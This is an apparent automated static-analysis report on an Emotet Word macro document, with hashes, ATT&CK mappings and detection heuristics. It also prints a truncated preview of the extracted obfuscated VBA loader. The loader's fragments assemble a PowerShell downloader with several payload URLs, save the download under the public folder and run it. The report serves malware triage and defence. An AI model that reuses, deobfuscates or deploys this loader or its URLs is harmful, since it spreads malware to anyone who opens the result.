Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 04745cf34ca1dbfe…

MALICIOUS

Office (OLE)

92.5 KB Created: 2017-11-08 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 5f689a0d512b65d57c3ff4ce233d30fd SHA-1: d27bf2a12d96160f4fd306ea3d1832bf59afa9ae SHA-256: 04745cf34ca1dbfee1b638d41675e1ccf6ed65059f839ed8734f34f14b989ee6
344 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, specifically an AutoOpen macro that uses Shell() to execute code. The ClamAV signature 'Doc.Macro.Emotet-6374344-0' strongly suggests the Emotet family. The VBA script attempts to construct a URL for downloading a second-stage payload, which is a common Emotet behavior.

Heuristics 10

  • ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52813 bytes
SHA-256: 02751826383a04ae5811a95117aef77058e37a028931e45220db7906cb264249
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 44 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AGTaZjzVC"
Function VjLNsbtZs()
CsrEfpoC = "" + VUJXMTR + Mid("CcZsJiYptM8l4OoDYCzqo1RW5L37bhWH).repLaCE(lqHKEBlqH,lqHBQtlqH).repLaCE('0J5bD1", 32, 41) + KZEqYOt + SsrLzwZ
ZjtoVEUX = "" + pZluEIK + Mid("js5frrEjftwa53+[CHar]75),GQ3h'+'j79N", 13, 22) + qODAiUu + kjNRhKF
LUMvPiwpwmW = "" + ZCuQzYJ + Mid("6jMVDVTzVGj7ui18L5D+'qH+lqHhost KEB'+'_.lqH+lqHExlq'+'H+lqHclqH+lqHeption.MlqH+lqnv0jaHkB", 20, 62) + ztjwXTG + cbJiBDC
fvAFJ = "" + XQKhdYZ + Mid("cEdpas = KlqHZXMlk13fOz4B839OMO", 4, 10) + SAVDKYC + PZJwPGJ
zFiiF = "" + TTaduZF + Mid("Y4GQ3+GQ3+lqHomlqH+lqH/lqH+lqHSSlqH+lqHbTyrS/,http:/'+'lqH+lGQ3+GQ3qH/www.deco'+'ry.ir/XlqH+lqHFlGQ3+GQ3E'+'TilqH+lqHrlqH+lqHRslqH+lqH/'+'CDGQ3+GQ3GlqH+lq'+'H.SplqH+oq5jiVTXui", 3, 163) + ukPoWNE + ztDAAiQ
IFlCUSpcLz = "" + XlMjjGc + Mid("HnABG2wjNEJN0UElSFFz6itoUUllAce('hj7',[sTRiNG][ChAR]92).rEplAce('xTr',[sTRiNG][ChAR]36) |. ( $eNv:PubLiC[13]+RUpLTtnKL7J", 28, 82) + iGBDAql + zwQVcUk
dWYTmpvMzUZ = "" + oRzJWAa + Mid("th3a7H3wYlGQ3+lqHWebClielqGQ3+GQ3H+lqHnt;lqH+lqHGQ3+GQ3KEBnlqH+lqHslqH+lqHadlqH+lqH'+'asd = new-olqH+lqHb'+'jecGQ3+GQ3t raGQ3+GQ3ndomlqH+lqH;lqH+lqHKEllrFGN", 11, 141) + zENUEFM + qcukFiI
DYftB = "" + WSwjSdh + Mid("mnTRwcBPp419IplzYiri3QwiQ4jhJudfJar]1'+'16),GQ3xTrGQ3).'+'rePLACE(GQ3lqHGQ3,[STRINg][CHar1JV1Li", 34, 56) + wazcsrw + vOErJOt
MjYblMiD = "" + mVLitZN + Mid("YjjMaYnFm2ipiYWuFoS28qEPqlqHlit(CDlqH+lqHG,ClqH+lqHDGlqH+lqH);KEBklqH+lqHarlqH+lqHalqH+lqHdt", 26, 65) + DSkijRm + cXVvGLL
JQkVzA = "" + jfVUzEI + Mid("iz5DlqBFrALc3DzYiQbivCEtNwaA9HqdN+lqHEBlqH+lqHnsadasd'+'l'+'qH+lqH.nexlqH+lqHt(1,lqH+lqH 3lqH+lqH432GQ3+GQ345);KE'+'Bhuas = lqH+'+'l'+'qHKlqH+lqHEBGQ3+'+'GQ3enlqH+lqHvlqH+lqH:pulq'+'H+lqHblilqH+lqHc + UCYF", 34, 168) + mTpaZLR + DGltROJ
WljuOZ = "" + alNGPaw + Mid("a+'+'l'+'qHbjeGQ3+GQ3ct lqH+lqHSlqH+lqHylqH+lqHslqH+lqHGQ3+GQ3tem.lqH+lqHGQ3+GQ3NlqH+lqHel'+'qH+lqHt.lqHGQ3+Ks46aRUjON71QL4ATJYb", 2, 107) + ROMbswj + OzBNZlJ
MQBzHU = "" + jKzivEp + Mid("Ub4twH+'qH+lqH:lqH+lqH//wlqH+l'+'qHww.lqH+lqHe'+'cobulqH+lqHildlqH+lqHslqH+lqHolulqH+GQ3+GQ3lqHtiolqH+lqHnsghlqH+lqH.lqH+lqHcom/ilZlqH+lqH/lqH+lqH,'+'httplqH+lqH://v'+'lqH+lqHir'+'tlqH+lqHualdol'+aO3NInK2uP37M6jFWi09bf2zW", 7, 190) + bwARKTs + wwUFjIE
vIZDSNKGnUP = "" + OqqEcFZ + Mid("3EtE1oKhj8LnjFwiZ3iR]GQ3+GQ3112+[cHaR]98+[cHaR]86),lqHJ5KlqH).repLaCE(([cHaR]67+[cHaR]68+[cHaR]71),[strING][cHaR]3GQ3+GQ39) ) GQ3).rePLACE(([C'+'Har]66+[CHar]81+[CHlS3jCGEKLHDzjqBFzW06", 20, 145) + KajRIjS + zThYuqO
fjntzNGj = "" + PcjzPkw + Mid("pcv5IluIVT3/lqH+lqH,http:/lqH+lqH/www.emont-dnlqH+lqHepr.com/DZolqH+lqHnlGQ3+GQ3qH+lqHGQ3+GQ3tElqH+lqHnlqH+lqH/,htlqH+l'+'qHGQ3+GQ3tpl'uJvXKR7puPWkwcEul9U", 12, 124) + CvJGdMz + CiVacmr
WiYXDnw = "" + rvaifzn + Mid("dZvPPoI5UpirpJJjwaRVPWqAqH+lqHBbclqH+lqHd lqH+lqH= ClqH+lqHDGhtlqH+lq'+'Htp://wwwlq'+'H+lqH.relqH+'+'lqHmakevision.colqH+lqHm/OpmlEVBr8sX3NlUMk", 25, 104) + dwAchid + iAcvmIK
vTBufi = "" + AwGtUod + Mid("XRzu5f6JWi1aCXROHessaglqH+lqHe;lqH+lqH}lqH+lqH}lqU9qp", 17, 33) + aJwPvjj + wpivvlW
RBlfJm = "" + osoWdwU + Mid("XpXIl3lqHtrinlGQ3+GQ3qH+lqHg(),lGQ3+GQ3qH+lqH KlqH+lqHEBhuas);Il'+'qH+lqHnvoke-Item(lqH+lqHKEBhuas);lqH+lqHbreaklqH'+'+lqH;}lqH+lqHclqH+lqHatlqH+lqHclqH+lqHh{lqH+lqHwlqH+lqHrite-l'aISJZZr", 6, 175) + KnhAvjC + JACBDEb
rlwSXwFvX = "" + HYIYbNp + Mid("L2jMDuQj8fiCn53 ('&( xTrPsHoMe[4]+'+'xTrPShome'+'[34]+GQ3xGQ3) ((GQ3.( GQ3+GQ3BQtENV:cOmspeC'+'[4,15,25]-joI'+'NlqHlqH)'+' ((lqHKlqH+lqHEBfranclqH+lqH l'+'qH+lqH= lqH+lqHnelqH+lqHw-olq'+'HW0c1XQmSwk", 16, 173) + mFFkFbk + ioEvCKT
OPcjjJRaIOv = "" + ticOomJ + Mid("YqOwuiBRsv2iLHEMdiovK1WCJ+'([cHaIib2", 26, 7) + hbLzaER + UlSqVhp
XchNI = "" + ToWhQCo + Mid("ZBf6CoWtkMMFBwvXVcj6$env:PUBLIC[5]+'X')UoUALbzDn", 21, 19) + UwYAJId + sLwLoCm
jiblihJQF = "" + TnRmCXj + Mid("a8hNsZwZ8InzlqH+lqHCDGlqH+lqHplqH+lqHb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.